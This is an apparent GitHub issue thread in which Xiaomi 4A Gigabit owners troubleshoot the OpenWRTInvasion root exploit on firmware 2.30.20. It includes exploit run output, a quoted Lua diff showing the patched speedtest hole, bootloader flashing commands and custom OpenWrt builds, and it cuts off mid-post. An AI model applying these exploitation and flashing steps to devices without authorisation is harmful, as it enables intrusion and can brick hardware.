Not working R4A (Xiaomi 4a Gigabit) 2.30.20

[teammate100]

Script appears to work, but ftp/ssh/telnet can not connect.
However it gets stok automatically.
This is Ubuntu 20.04.3 completely stock.
I also tried with option 2 to download needed files from remote github repository, no difference.

*Please note the Docker would not build correctly with either docker or sudo docker, so I git cloned OpenWRTInvasion and put my OpenWRT firmware in there.

$ python3 remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 'miwifi.com']: 192.168.31.1
Enter router admin password: OpenWRTInvasion
There two options to provide the files needed for invasion:
   1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`.
   2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)
Which option do you prefer? (default: 1)1
****************
router_ip_address: 192.168.31.1
stok: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
file provider: local file server
****************
start uploading config file...
start exec command...
local file server is runing on 0.0.0.0:49557. root='script_tools'
done! Now you can connect to the router using several options: (user: root, password: root)
* telnet 192.168.31.1
* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.31.1
* ftp: using a program like cyberduck

Then I try
telnet 192.168.31.1
But I get
telnet: connect to address 192.168.31.1: Connection refused
same with ssh and ftp.

I assume this person had success with this version 2.30.20, but their advice isn't clear.
#135 (comment)

[acecilia]

Seems your machine cannot connect to the router. I cant help much, as this depends on your network setup. My suggestion would be that you try to simplify your setup as much as possible

[teammate100]

Seems your machine cannot connect to the router. I cant help much, as this depends on your network setup. My suggestion would be that you try to simplify your setup as much as possible

This is not the issue, because I have no problem connecting to the router with DHCP or manual IP (192.168.31.2). The network is also working perfectly with modem connected to WAN.
No WIFI used, this is direct ethernet cable between the PC and the router.

I also tried power cycling the router several times and doing the script immediately upon bootup, no difference.

I also tried in Windows 10 with Docker, no difference.

My 4a Gigabit is manufactured 07/2022. Is there something I can check for you on the router itself?

[acecilia]

Is there something I can check for you on the router itself?

Not really :( I do not have access to a router to test it out, I do not think I can help

[MosesCN]

same situation, all works well until connecting to the router with telnet or ssh, any solution? thx

[Maxlinn]

same situation, i tried to invade in several versions of this tool, but none of them could allow me to connect through telnet.

i spent hours trying different version, other guys don't waste time on it, it won't work.

i think i would got refund on the router i bought, it disappointed me.

[acecilia]

Version 3.0.10 is reported to work: #145

[acecilia]

Added information to readme, thanks!

[tangmingxing1988]

Maybe the security issue has been fixed officially, I uncomment the result of upload code, and got the following error:
start uploading config file... {"code":1629,"msg":"解压失败，可能文件已经损坏"}

Means "Couldn't unzip, the file is corrupt"

[LordPinhead]

I've dumped the chip and will reverse engineer the differences and look for the reason and maybe a way to hack it again. The cgi-bin/upload file is the same, now I have to look which file will be executed for the c_upload api endpoint. The hack is pretty simple, as long we get a few files on the router

[mark4z]

any update

[tangmingxing1988]

I've dumped the chip and will reverse engineer the differences and look for the reason and maybe a way to hack it again. The cgi-bin/upload file is the same, now I have to look which file will be executed for the c_upload api endpoint. The hack is pretty simple, as long we get a few files on the router

I am afraid it's not about c_upload, maybe testing net speed will not evaluate the command in the url anymore, so it will be hard, or even impossible.

Anyway, it's my opinion, good luck.

[LordPinhead]

I will see what happens. If everything fails, we have to programm the chip the hardcore way and downgrade it to a vulnerable firmware or openwrt directly

[LordPinhead]

So, I looked up what the vulnerable script was. Its /usr/bin/upload_speedtest, or was. The upload saved a file in /tmp/ named speedtest_urls.xml with the script and /usr/bin/speedtest would execute the wget command and that, loaded the script. Sadly, the code changed:

2.28.69 and

`
local cfg = {
....
['xmlfile'] = "/usr/share/speedtest.xml",
['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""
filexml = io.open(cfg.tmp_speedtest_xml)
if filexml then
filexml:close()
filename = cfg.tmp_speedtest_xml
else
filename = cfg.xmlfile
end
filename = cfg.xmlfile
`

To the new 2.30.20:
`
local cfg = {
....
['xmlfile'] = "/usr/share/speedtest.xml",
['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""
--filexml = io.open(cfg.tmp_speedtest_xml)
--if filexml then
-- filexml:close()
-- filename = cfg.tmp_speedtest_xml
--else
-- filename = cfg.xmlfile
--end
filename = cfg.xmlfile
`

And that's the reason the attack is not working anymore. (For noncoders, they did not load the /tmp file, they use the internal file that is in the firmware, and we can't change that)

I upload the bindump of 2.30.20, and we could look for another bug, but atm, our best solution would be downgrading the router to a vulnerable version or directly install OpenWRT with a programmer.

Extracted dump with Binwalk (on Linux, you need root or sudo -s)
https://drive.proton.me/urls/CGCNWSMQB0#bkj9NIVPIR06

Direct Bin dump from the chip
https://drive.proton.me/urls/58Q1BHMN18#GKbX5gTA6XBS

I also tried to activate the serial console, but it refused the new parameters, here is the serial console output
https://drive.proton.me/urls/AF1Z9XA290#ct6pXZqm6ijn

Changed uboot code:
bootcmd=mtkautoboot bootdelay=9 stdin=serial stdout=serial stderr=serial flag_boot_rootfs=0 wl1_radio=1 model=R4AV2 mode=Router no_wifi_dev_times=0 boot_wait=on uart_en=0 telnet_en=1 CountryCode=CN color=101 ssh_en=0 nv_wan_type=static flag_boot_success=1 flag_try_sys1_failed=0 flag_try_sys2_failed=0 normal_firmware_md5=11b6c8523198ac50137219388168d79d flag_boot_type=2 flag_ota_reboot=0 flag_last_success=0 restore_defaults=0 Router_unconfigured=0
Telnet was activated, but does nothing, bootdelay to 9 seconds and bootwait to on. But nope, no serial console working.
Does somebody have an old bindump I could play with?

[tangmingxing1988]

Does somebody have an old bindump I could play with?

Thanks for your efforts, and I can't make it work for serial console, so the boot delay won't let you download file from tftp?

[LordPinhead]

Does somebody have an old bindump I could play with?

Thanks for your efforts, and I can't make it work for serial console, so the boot delay won't let you download file from tftp?

Sadly no. First:

`U-Boot 2018.09 (Feb 22 2022 - 03:57:56 +0000), Build: jenkins-common_router_openwrt_bash_ota_publish-73

CPU: MediaTek MT7621AT ver 1, eco 3
Clocks: CPU: 880MHz, DDR: 600MHz, Bus: 220MHz, XTAL: 40MHz
Model: MediaTek MT7621 reference board
DRAM: 128 MiB
pcie reset control...
gpio data reg:0xfffd601a
gpio data reg:0xfff5601e
gpio data reg:0xfffd601e
Loading Environment from SPI Flash... SF: Detected gd25q128b with page size 256 Bytes, erase size 64 KiB, total 16 MiB
*** Warning - bad CRC, using default environment

In: uartlite0@1e000c00
Out: uartlite0@1e000c00
Err: uartlite0@1e000c00
Net:
Warning: eth@1e100000 (eth0) using random MAC address - 82:73:78:2e:b6:69
eth0: eth@1e100000

restore_defaults:
boot_wait is off !
Booting System 1 @00xBFD80000
SF: Detected gd25q128b with page size 256 Bytes, erase size 64 KiB, total 16 MiB
bootargs: console=ttyS0,115200 uart_en=0 factory_mode=0 mem=128m `

You see the "Warning - bad crc", this happens when I modify the bin dump and flash it onto the router and it boots.

I've tried to downgrade the firmware to various versions, everytime, the router downloads the img from my PC and then says "nope, magic hex number wrong" and stops there.

I did not try a squash or root fs of OpenWRT though, but I guess it's the same issue.

ATM, I'm searching for some bugs. I found something about the config backup, it's encrypted with AES, but the key in /squash-fs/etc/config/cfgbackup is just a hint, I need the cipher and if a key is somewhere or a salt. The LUA files may have it, but I didn't find anything there yet. My hope is, I can inject code via the upload of a config.

But this will take some time. I'm unhappy myself, it's the second router in 2 weeks I can't get running with OpenWRT :(

[tangmingxing1988]

But this will take some time. I'm unhappy myself, it's the second router in 2 weeks I can't get running with OpenWRT :(

I almost come here every day to see if there is any update. Waiting for your progress, my friend 👍

[mark4z]

Me too

[tangmingxing1988]

To anyone who is interested, here is my last thought about this, and maybe it's wrong, just for advise:

The problem is not only about hacking into the system, but the 5g chip has changed(now mt7613ben), so the Openwrt firmware is not suitable anymore. We not only need the new hacking way, but also new firmware.

[LordPinhead]

That would suck tbh. If the chip is not supported by the Linux Kernel. We could ask in the OpenWrt Forum for it, but so far, I found no way around it. But I have more projects running, I can't put that much time into this.

Making a 21.x image with the Kernel Driver would be something, V3 need. But that's maybe the reason why downgrading the firmware did not work.

[RadioOperator]

where I can download the 2.30.20 factory firmware?
My 4AG is 2.28.69 chinese version, works no problems.

[LordPinhead]

So far, I didn't find a binary of it anywhere. I dumped my chip and that's it. But with the hardware changes, I guess you can't flash it back onto your chip.

[RadioOperator]

Then 2.30.20 cannot downgrade to the 2.28.69?

[LordPinhead]

I guess no, because I couldn't do it with any method I found. I tried the tftp debricking version too. The box loads the image, but then stops and says "the magic number is wrong".
That's why I search for firmware errors to get somehow access.

Changing the binary image is not working btw, I tried and it recovered the default config. The bootloader is the problem here.

[RadioOperator]

then, could we re-flash the bootloader from serial connection?
I can dump my 4AG bootloader bin code from openwrt (mtd0) for you.

[LordPinhead]

I don't know, I have a chip programmer to do it, you can also test my dump on your chip, but you can also put a chip dump somewhere for me, I'll try it.

[RadioOperator]

I just flash my 4AG from openwrt back to factory image via TFTP server, failed on v3.0.24 (File too large! / Header check error! /
Image verify failed! / ========Upgrade fail!======== ).

but success on v2.28.69, then use OpenWRTInvasion OK!

[mark4z]

@MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's breed-mt7621-pbr-m1.bin

thanks for your suggestion. My device is Xiaomi 4A Gigabit (2.30.20). first, I have downloaded the code with the link here and successfully got the console via WSL in windows. Then I used mobaxterm to upload breed-mt7621-pbr-m1.bin to path /tmp finally, I use command mtd -r write /tmp/breed.bin Bootloader after a while， my device turns to a faint blue light and the ports are unresponsive ， it must be broken. (sad) I have refered to the tutorials Links

Do you know the reason for the failure to flash the breed? I have backed up the original system of the router and plan to use the hardware programmer when I have time.

This breed broken ur leds, so that it's always faint blue light, but do not worry, just try 192.168.1.1 to enter breed gui.

[MrTaiKe]

@mark4z @fengjiaqi927
I rewrote my readme.md, probably a better instruction to follow.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2

R4AGv2 working openwrt bin file (except LED lights)
Download build: wetransfer.com#L1 Download Link: https://we.tl/t-wUdXMxjDBz
or
Release Bin file

@fengjiaqi927, mark4z is right, BREED gui is at 192.168.1.1, Openwrt gui is at 192.168.31.1, You are confused with addresses. .

[MrTaiKe]

Xiaomi R4AGv2 router seems working with Openwrt bin, but LED lights are not working properly. Always blue faint lights turned on.....

Anyone know how to fix this issue?

[fengjiaqi927]

@MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's breed-mt7621-pbr-m1.bin

thanks for your suggestion. My device is Xiaomi 4A Gigabit (2.30.20). first, I have downloaded the code with the link here and successfully got the console via WSL in windows. Then I used mobaxterm to upload breed-mt7621-pbr-m1.bin to path /tmp finally, I use command mtd -r write /tmp/breed.bin Bootloader after a while， my device turns to a faint blue light and the ports are unresponsive ， it must be broken. (sad) I have refered to the tutorials Links
Do you know the reason for the failure to flash the breed? I have backed up the original system of the router and plan to use the hardware programmer when I have time.

This breed broken ur leds, so that it's always faint blue light, but do not worry, just try 192.168.1.1 to enter breed gui.

Thanks! @MrTaiKe and @mark4z. You saved my life ！！！！ The gateway changed from 192.168.31.1 to 192.168.1.1 !
Although after input the command ipconfig in windows cmd, there is no gateway in the eth.

By the way, the password of the new image openwrt-ramips-mt7621-xiaomi_mi-router-4a-gigabit-v2-squashfs-sysupgrade.bin is password

I want to download uci-app-bypass for the .bin you provided, but the kernel version is mismatched, can you build one for me if this problem is eassy to you? I did not know how to build ...... @MrTaiKe
I have taken this job to the TODO list, once i successed, i will upload the new firmware image for the community~~~

Installing luci-app-bypass (git-23.303.44828-ba42a9a) to root...
Downloading https://op.supes.top/packages/mipsel_24kc/kiddin9/luci-app-bypass_git-23.303.44828-ba42a9a_all.ipk
Collected errors:

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-reject

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-ipt

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-log

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-core

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nfnetlink

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-ipset

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-conntrack

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-nat

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-nat

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-tproxy

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-tproxy

• pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-conntrack-netlink

• opkg_download: Failed to download https://op.supes.top/packages/mipsel_24kc/kiddin9/luci-app-bypass_git-23.303.44828-ba42a9a_all.ipk, wget returned 4.

• opkg_download: Check your network settings and connectivity.

• opkg_install_pkg: Failed to download luci-app-bypass. Perhaps you need to run 'opkg update'?

• opkg_install_cmd: Cannot install package luci-app-bypass.

the kernel information of the firmware is shown as below:

root@R4AGv2:~# uname -a
Linux R4AGv2 5.4.216 #0 SMP Sun Oct 9 02:46:49 2022 mips GNU/Linux

[MrTaiKe]

@fengjiaqi927, the world should be better when people can help each other! 👍 I am new to Openwrt and I spent a lot of time trying to figure things out. That is painful. 讓台客幫點忙小意思 😊 . Best Luck to you!
(Please star my repositories if it helps) lol

[MrTaiKe]

@fengjiaqi927 I compiled a minimal version with luci-app-bypass. it took almost 3 hours. I am not sure why there is no sysupgrade bin, but there is also a ipk of luci-app-bypass. Perhaps, you still can find it useful for now. Give it a try and let me know. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3435975079 Hope it helps!

(NOTE: I guess that I loaded too many themes causing the image too big to produce sysupgrade.bin)

[fengjiaqi927]

@fengjiaqi927 I compiled a minimal version with luci-app-bypass. it took almost 3 hours. I am not sure why there is no sysupgrade bin, but there is also a ipk of luci-app-bypass. Perhaps, you still can find it useful for now. Give it a try and let me know. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3435975079 Hope it helps!

(NOTE: I guess that I loaded too many themes causing the image too big to produce sysupgrade.bin)
@MrTaiKe Thanks for your luci-app-bypass.ipk

I open the Internet Information Services in my windows10. And put the packages you provided in the wwwroot dir.
Then I add the local packages to the opkg configs like this :
(192.168.31.227 is my windows10's IP)

src/gz local_base http://192.168.31.227/base
src/gz local_luci http://192.168.31.227/luci
src/gz local_packages http://192.168.31.227/packages
src/gz local_routing http://192.168.31.227/routing
src/gz local_small8 http://192.168.31.227/small8
src/gz local_telephony http://192.168.31.227/telephony

Then I use opkg update

root@R4AGv2:~# opkg update
Downloading http://192.168.31.227/base/Packages.gz
Updated list of available packages in /var/opkg-lists/local_base
Downloading http://192.168.31.227/luci/Packages.gz
Updated list of available packages in /var/opkg-lists/local_luci
Downloading http://192.168.31.227/packages/Packages.gz
Updated list of available packages in /var/opkg-lists/local_packages
Downloading http://192.168.31.227/routing/Packages.gz
Updated list of available packages in /var/opkg-lists/local_routing
Downloading http://192.168.31.227/small8/Packages.gz
Updated list of available packages in /var/opkg-lists/local_small8
Downloading http://192.168.31.227/telephony/Packages.gz
Updated list of available packages in /var/opkg-lists/local_telephony
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/targets/ramips/mt7621/packages/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_core
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/base/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_base
Downloading https://mirrors.cloud.tencent.com/lede/releases/18.06.9/packages/mipsel_24kc/luci/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_luci
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/packages/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_packages
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/routing/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_routing
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/small8/Packages.gz
*** Failed to download the package list from https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/small8/Packages.gz

Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/telephony/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_telephony
Collected errors:
 * opkg_download: Failed to download https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/small8/Packages.gz, wget returned 8.

（The mirror source does not have this file, but it seems to have no effect, ignore the error）

Then I use opkg install luci-app-bypass

opkg install luci-app-bypass
Multiple packages (libgcc1 and libgcc1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libgcc1 and libgcc1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libgcc1 and libgcc1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libatomic1 and libatomic1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libatomic1 and libatomic1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Unknown package 'luci-app-bypass'.
Collected errors:
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-reject
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-ipt
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-log
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-core
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nfnetlink
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-ipt-ipset
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-conntrack
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-nat
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-nat
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-tproxy
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-tproxy
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nf-conntrack-netlink
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-reject6
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-nf-reject6 found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nf-conntrack6
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-log6
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-nf-log6 found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-crypto-hash
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-crypto-crc32c
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-crypto-crc32c found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-lib-crc32c
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-lib-crc32c found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nft-core
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-nft-core found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency redsocks2 for luci-app-bypass
 * pkg_hash_fetch_best_installation_candidate: Packages for luci-app-bypass found, but incompatible with the architectures configured
 * opkg_install_cmd: Cannot install package luci-app-bypass.

I search the dependency packages in the local source you provided, the kernel version is 5.4.223, which is mismatch with the needed kernel version 5.10.153.

I have no idea how to solve this error. I will try to build a firmware myself. could you teach me how to build a R4AGv2 with passwall.ipk ？
I plan to refer to the link below to learn the operation process, but I don't know how to combine with the existing 4A configuration file.
xiaorouji/openwrt-passwall#1603

[MrTaiKe]

I have no idea how to solve this error. I will try to build a firmware myself. could you teach me how to build a R4AGv2 with passwall.ipk ？ I plan to refer to the link below to learn the operation process, but I don't know how to combine with the existing 4A configuration file. xiaorouji/openwrt-passwall#1603

@fengjiaqi927
I am not using Windows OS, and I am not sure all your setups. I recommend you to watch this video first before you spend more time on this. https://www.youtube.com/watch?v=WJ3VollEYy4 , especially the fifth minutes 第5分鍾請注意。 Pay attention that he provided a few ways to install new package.
Maybe it will help to save you a lot of time. let me know if it helps!

[fengjiaqi927]

I have no idea how to solve this error. I will try to build a firmware myself. could you teach me how to build a R4AGv2 with passwall.ipk ？ I plan to refer to the link below to learn the operation process, but I don't know how to combine with the existing 4A configuration file. xiaorouji/openwrt-passwall#1603

@fengjiaqi927 I am not using Windows OS, and I am not sure all your setups. I recommend you to watch this video first before you spend more time on this. https://www.youtube.com/watch?v=WJ3VollEYy4 , especially the fifth minutes 第5分鍾請注意。 Pay attention that he provided a few ways to install new package. Maybe it will help to save you a lot of time. let me know if it helps!

It seems that I still have a long way to go. And the video is tend to teach how to install software on openwrt. But I want to learn how to build the ipk for the specified kernel and platform with the source code. or learn how to build a new sysupgrade.bin on xiaomi 4AGv2 with the specified kernel(then I can use the bypass with kernel 5.10.146-1-1 https://op.supes.top/packages/mipsel_24kc/kiddin9/luci-app-bypass_git-23.303.44828-ba42a9a_all.ipk)
Thanks again for your help!!!! @MrTaiKe 路漫漫其修远兮，吾将上下而求索

[MrTaiKe]

@fengjiaqi927
Learning how to compile Openwrt sysupgrade.bin? it's a long way to learn, For a quick starter, I picked some up by reading the README.md of https://github.com/wbs306/Action_OpenWrt_Xiaomi_R4AG. ( I started learning from 6 days ago.)

Meanwhile, Check this out, there are ipk files for passwall1, passwall2, bypass, built with Kernel Version 5.4.216.
However, when I try to compile them for you, I guess that the image exceeded 16MB, so it did not output a syssugrade.bin, because there are many dependencies..... this device only has ROM 16MB.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3449151089#artifacts

I also built a minimal version of Kernel 5.4.216, which contains a syssugrade.bin that you can flash onto your router.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3447034491#artifacts

You probably could try something out from these two built(s). Perhaps, first flash syssugrade.bin from 3447034491, and manually add ipks from 3449151089. Probably have to watch out the ROM space limitation.... You probably can not have all ipks install, or you will have to buy a device with larger ROM. BEST LUCK to you

[fengjiaqi927]

@fengjiaqi927 Learning how to compile Openwrt sysupgrade.bin? it's a long way to learn, For a quick starter, I picked some up by reading the README.md of https://github.com/wbs306/Action_OpenWrt_Xiaomi_R4AG. ( I started learning from 6 days ago.)

Meanwhile, Check this out, there are ipk files for passwall1, passwall2, bypass, built with Kernel Version 5.4.216. However, when I try to compile them for you, I guess that the image exceeded 16MB, so it did not output a syssugrade.bin, because there are many dependencies..... this device only has ROM 16MB. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3449151089#artifacts

I also built a minimal version of Kernel 5.4.216, which contains a syssugrade.bin that you can flash onto your router. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3447034491#artifacts

You probably could try something out from these two built(s). Perhaps, first flash syssugrade.bin from 3447034491, and manually add ipks from 3449151089. Probably have to watch out the ROM space limitation.... You probably can not have all ipks install, or you will have to buy a device with larger ROM. BEST LUCK to you

@MrTaiKe
I have tried the guide and successfully installed the passwall ~

Thank U !!!

It seems that the supported protocols are limited due to space constraints , eg : v2ray

Anyway, Let's put an end to this for now ~ ， I can use SSR node alternatively

[MrTaiKe]

@fengjiaqi927
I am very glad you made it!!! very good!! Yes, you will have to unload unwanted app to accompany the ROM space constrain. So you somehow managed to combined both 3447034491 and 3449151089 to make it happen? Was dealing with dependencies a big hurdle this time? I am curious if you did all this with command lines? Thx

[fengjiaqi927]

@fengjiaqi927 I am very glad you made it!!! very good!! Yes, you will have to unload unwanted app to accompany the ROM space constrain. So you somehow managed to combined both 3447034491 and 3449151089 to make it happen? Was dealing with dependencies a big hurdle this time? I am curious if you did all this with command lines? Thx

I reboot my 4AGv2 and flash the 3447034491.bin at first. Then I download the packages in 3449151089 and try to install by follow step :

A simple tutorial for installing packages locally：

1. open the internet information services (IIS) on windows to establish a local web server
2. download the packages to be installed, and copy them to the root directory of the web page
   test the web server by enter the website http://192.168.31.227/base(the IP should be replaced accroding to yours), and try to download the .ikp file.
3. add the local packages to the opkg config list

src/gz local_base http://192.168.31.227/base
src/gz local_luci http://192.168.31.227/luci
src/gz local_packages http://192.168.31.227/packages
src/gz local_routing http://192.168.31.227/routing
src/gz local_small8 http://192.168.31.227/small8
src/gz local_telephony http://192.168.31.227/telephony

4. opkg update
5. opkg install luci-app-passwall

[ivan-semkin]

hello! can you please also build ipk openvpn (openvpn-openssl and luci-app-openvpn) for kernel version 5.4.216?

[MrTaiKe]

hello! can you please also build ipk openvpn (openvpn-openssl and luci-app-openvpn) for kernel version 5.4.216?

@ivan-semkin-gismart , I tried to build one for you for kernel 5.4.216, but failed a few times. was able to built one with 5.4.224, you can browse the folder "Luci" to find ipks etc... Hope that this could help you anyway.
openvpn-openssl and luci-app-openvpn + sysupgrade.bin

[MrTaiKe]

I reboot my 4AGv2 and flash the 3447034491.bin at first. Then I download the packages in 3449151089 and try to install by follow step

@fengjiaqi927 , 👍 Great!! Glad it all worked out smoothly!

[ivan-semkin]

@MrTaiKe I don't think that it will work due to kernel version mismatch. Can you maybe try to build wireguard-tools then? And luci-app-wireguard

[MrTaiKe]

@MrTaiKe I don't think that it will work due to kernel version mismatch. Can you maybe try to build wireguard-tools then? And luci-app-wireguard

@ivan-semkin-gismart , did you look into the zip file? It also has the sysupgrade.bin. It was a base system built ONLY with openvpn-openssl and luci-app-openvpn, a very slim bin (image). Perhaps, you could use this bin to start with other ipk(s). Btw, I also wonder if you still could install them onto any kernel version with 5.4.xx ? what do you think?

If none of them works, let me know. I will try

[ivan-semkin]

@MrTaiKe thank you for the help, I was able to get openvpn working

[MrTaiKe]

@MrTaiKe thank you for the help, I was able to get openvpn working

@ivan-semkin-gismart, I am glad to hear it works. Here is a also link for wireguard ipk(s) with Kernel 5.4.224
I guess you probably find these ipk somehow useful. Perhaps, maybe it could work with any kernel version starting with 5.4.xx, ( I am not sure. Plz let me know if it works. Thx!)
wireguard-tools and luci-app-wireguard + sysupgrade.bin

[ivan-semkin]

@MrTaiKe I was able to install it on 5.4.xx, I guess only kernel modules are completely incompatible (kmod-*)

[chekn]

I managed to get shell access on this device without a chip programmer

The instructions are valid for macOS and GNU/Linux. I don't know how to pipe stuff from or to netcat on Windows.

Introduction

I am on R4AV2 firmware MiWiFi 稳定版 2.30.20
